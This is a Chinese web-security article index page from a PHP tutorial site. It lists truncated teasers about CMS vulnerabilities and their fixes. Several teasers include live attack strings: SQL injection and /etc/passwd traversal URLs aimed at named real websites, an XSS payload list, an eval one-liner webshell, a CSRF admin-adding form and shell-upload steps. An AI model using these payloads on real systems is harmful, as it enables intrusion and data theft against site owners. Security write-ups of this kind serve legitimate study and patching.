MC Shop网络商城文件上传漏洞与修复 - 网站安全关注热度:51
漏洞描述:MC Shop网络商城后台上传未进行身份验证,导致构造上传畸型文件获取网站shell。漏洞文件:upload.asp 存在上传漏洞 文件地址网站后台构造上传:http://site/adminn/upload.asp?fuptype..[详情]
中微购物系统v5.0注入漏洞分析及修复 - 网站安全关注热度:32
下面是conversion.asp页面的代码,还有很多页面也有相同情况。!--#include file="conn.asp"-- !--#include file="webconfig.asp"-- % if request.Cookies("cnhww")("username")="" then response.Redirect "..[详情]
ACTCMS系统漏洞利用及修复 - 网站安全 - 自学php关注热度:123
ACTCMS是一款完全开源的程序,有UTF-8和GB2132两个编码版本,支持ACCESS和MSSQL两种数据库。前言: 前两天在群闲聊的时候听群友有说遇到了个ACTCMS的系统,大家并在对ACTCMS多扯了几句,当时..[详情]
Ecshop2.7.2持久型XSS(可获得管理员帐号)及修复关注热度:37
简要描述:个人资料修改时,Javascript代码过滤不够严格,XSS代码直接进入数据库详细说明:密码保护问题这一项,没有使用正则过滤,其他的的都有正则过滤。我们可以在密码保护问题..[详情]
Discuz非创始人管理员代码执行 - 网站安全 - 自学关注热度:54
by:alibabaglobal.func.phpfunction sendpm($toid, $subject, $message, $fromid = ) { 02 if($fromid === ) { 03..[详情]
Discuz! 7.1 & 7.2 后台远程代码执行漏洞及修复关注热度:189
年初跟那个前台代码执行一起看到的,这个清晰明朗的代码执行,看到的人估计也不少,好在坚持了这么久一直没人公布,这大半年还用了很多次,可是...可是,最终还是有人忍不住要..[详情]
揭秘黑客所用的CSS代码挂马方法 - 网站安全 - 自关注热度:52
跟着Web2.0的普及,各种网页殊效用得越来越多,这也给黑客一个可乘之机。他们发现,用来制作网页殊效的CSS代码,也可以用来挂马。而比较讽刺的是,CSS挂马方式实在是从防范E挂马的..[详情]
如何用IIS防火墙清除“挂马”代码? - 网站安全关注热度:38
网站被反复“挂马”,怎么办?很多企业网管经常发现,在清除服务器硬盘 ASP / PHP 文件中的“挂马”代码连接之后,过一会又被“入侵者”加上,这些是非常头疼的问题。其实利用II..[详情]
SA权限添加管理员帐号 - 网站安全 - 自学php关注热度:39
注入点:http://www.enzymotec.com/Page.asp cc=0102041102 IP:192.117.122.145 以色列 inurl:asp具体脚本命令:1.判断是否有注入;and 1=1 ;and 1=2;and user_name()=dbo 判断当前系统的连接用户是不是sa2.添加系统的管..[详情]
HZHOST虚拟主机在提权中的进一步利用及安全防范关注热度:28
1。c:windowsemp下有hzhost主机留下的ftp登陆记录。有用户名和密码2。是利用hzhost拿系统主机最高权限的。安装了hzhost的主机,其mssql sa密码,mysql root密码还有serv-u的administrator密码全部保存在注..[详情]
KCFinder 2.2 文件上传漏洞及修复方案 - 网站安全关注热度:121
KCFinder 2.X上传页未进行严格过滤,导致文件上传漏洞。1.Go to target linkhttp://localhost/KCFinder/browse.php2.upload your shell as [shell.php.jpg]注:只适用于linux系统的解析漏洞。修复方案:修改原文件..[详情]
Phpcms 2008 space.api.php SQL注入漏洞及修复 - 网站安全关注热度:34
影响版本:Phpcms 2008漏洞描述:Phpcms 是国内领先的网站内容管理系统,同时也是一个开源的PHP开发框架。在文件api/space.api.php中:$arr_content = $content-listinfo("userid=$userid", $order, 1, 10); //第7行..[详情]
Phpcms 2008 query.php SQL注入漏洞及修复方案 - 网站安关注热度:28
影响版本:Phpcms 2008漏洞描述:在文件ask/query.php中:case edit_answer: //第39行if($dosubmit){if(strlen($answertext) 10000) showmessage(回答字数不能超过10000个字符);..[详情]
Exponent CMS v0.97 Multiple Vulnerabilities - 网站安全 - 自关注热度:20
Exponent CMS v0.97 Multiple VulnerabilitiesVendor: OIC Group Inc.Product web page: http://www.exponentcms.orgAffected version: 0.97Summary: Open Source Content Management System (PHP+MySQL)...[详情]
针对MYSQL udf.dll提权的安全防御 - 网站安全 - 自学关注热度:36
参考见本文:http://www.2cto.com/200806/27544.html针对MYSQL udf.dll提权的安全防御删除udf.dll和langouster_udf.dll,新建udf.dll和langouster_udf.dll设为只读,权限上限制 可防止所有langouster_udf.dll专用网马批..[详情]
一个replace()引发的血案 - 网站安全 - 自学php关注热度:33
Twitter在不久前曾经爆了一个XSS,悲剧的是,程序员的patch方案有问题,结果再次被爆菊了。详细的分析可以看http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html我们姑且不去..[详情]
跨站式攻击防范攻略 - 网站安全 - 自学php关注热度:17
防黑行黑,黑与白之间的较量一直没有停息过。早期的黑客从私人独立的计算机渐渐的转化为商业网络战中的主角,很多朋友看过网络中的黑客产业链,从低端的游戏到高端的企业数据..[详情]
eval一句话木马原理详解 - 网站安全 - 自学php关注热度:47
%eval request("#")%来解释下它的原理.首先是JavaScript脚本的开始标记,其中RUNAT属性的值SERVER表示脚本将在服务器端运行,后面的eval是一句话木马的精华部分,使用 eval方法的话它里面的字符串将..[详情]
phpcms2008本地文件包括及利用(执行任意SQL脚本)关注热度:23
文件wap/index.php?phpinclude ../include/common.inc.php;include ./include/global.func.php;$lang = include ./include/lang.inc.php;if(preg_match(/(mozilla|m3gate|winwap|openwave)/i, $_SERVER[HTTP_USER_AGENT]))..[详情]
MAC, Google Location Services and XSS - 网站安全 - 自学关注热度:33
samy 在blackhat上做了一次非常精彩的演讲“How I Met Your Girlfriend”其中提到了通过xss抓取路由的mac信息,然后提交到Google Location Services 服务以查询真实地址的技巧。http://www.samy.pl/mapxss/Fi..[详情]
关于evercookie - 网站安全 - 自学php关注热度:78
大风起兮云飞扬这个东西比较敏感,是把双刃剑,所以我不想在blog上讲太详细。http://samy.pl/evercookie/这是一个给客户端打上永久标记的项目,类似技术我以前在blog里也写过,很多广告提..[详情]
Joomla! JomSocial组件任意文件上传漏洞及修复 - 网站关注热度:60
影响版本:JomSocial JomSocial 1.8.9漏洞描述:Joomla!是一款开放源码的内容管理系统(CMS)。Joomla! JomSocialy组件的实现上存在设计漏洞,远程攻击者可能利用此漏洞上传任意文件到Web目录,最终..[详情]
使用HTTP的DELETE方法删除黑页 - 网站安全 - 自学关注热度:36
文章作者:Nana今天小驹在群里发了一个网址,原来是一个gov.cn的网站被外国黑客黑了,看了下,应该是WebDAV的问题。不过让我很上火。自己拿HTTP的perl脚本扫了下,似乎服务器除了WebDAV,..[详情]
Chipmunk Chat CSRF远程攻击漏洞及修复 - 网站安全关注热度:24
Chipmunk Chat 程序后台缺少验证,导致CSRF攻击远程添加管理员漏洞。Exphtmlform method="post" action="http://www.chinasg.tk/admin/reguser.php"Type Username Here: input type="text" name="adminname" siz..[详情]
XSS 跨站脚本攻击安全测试语句 - 网站安全 - 自学关注热度:28
"scriptalert("XSS")/script"STYLE@import"javascript:alert(XSS)";/STYLE"img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%..[详情]
用FindBugs分析代码漏洞 - 网站安全 - 自学php关注热度:26
静态分析工具承诺无需开发人员费劲就能找出代码中已有的缺陷。当然,如果有多年的编写经验,就会知道这些承诺并不是一定能兑现。尽管如此,好的静态分析工具仍然是工具箱中的..[详情]
8一8最近的Kernet x86_64的32位支持的2个漏洞 - 网站关注热度:36
CVE-2010-3081和3301这2个都是X86_64的Kernel在32位支持上的漏洞,据说07年的时候就出现过问题,后来补丁了,但是不知为何08年更新的时候把这个补丁又丢了。类似的问题好像不止在Kernel上出..[详情]
PHP Hosting Directory 2.0 后台验证绕过漏洞及修复 -关注热度:30
PHP Hosting Directory 2.0 程序后台验证不严格,导致可绕过密码验证登录后台。Google: "powered by PHP Hosting Directory 2.0"默认后台:http://127.0.0.1/admin利用方法:不需要输入任何密码,通过cookie欺骗进..[详情]
征途SQL注入及修复 - 网站安全 - 自学php关注热度:25
http://zt.ztgame.com/communion/showpic.php?consortiaid=2%20and%203=8%20union%20select%201,2,3,4,5,6,7,user(),9,10,11,12,13,14,15%20--%20And%208=11修复方案:过滤..[详情]
emule.com越权访问/etc/passwd - 网站安全 - 自学php关注热度:27
http://www.emule.com/poetry/?page=..%2F..%2F../..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00..[详情]
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com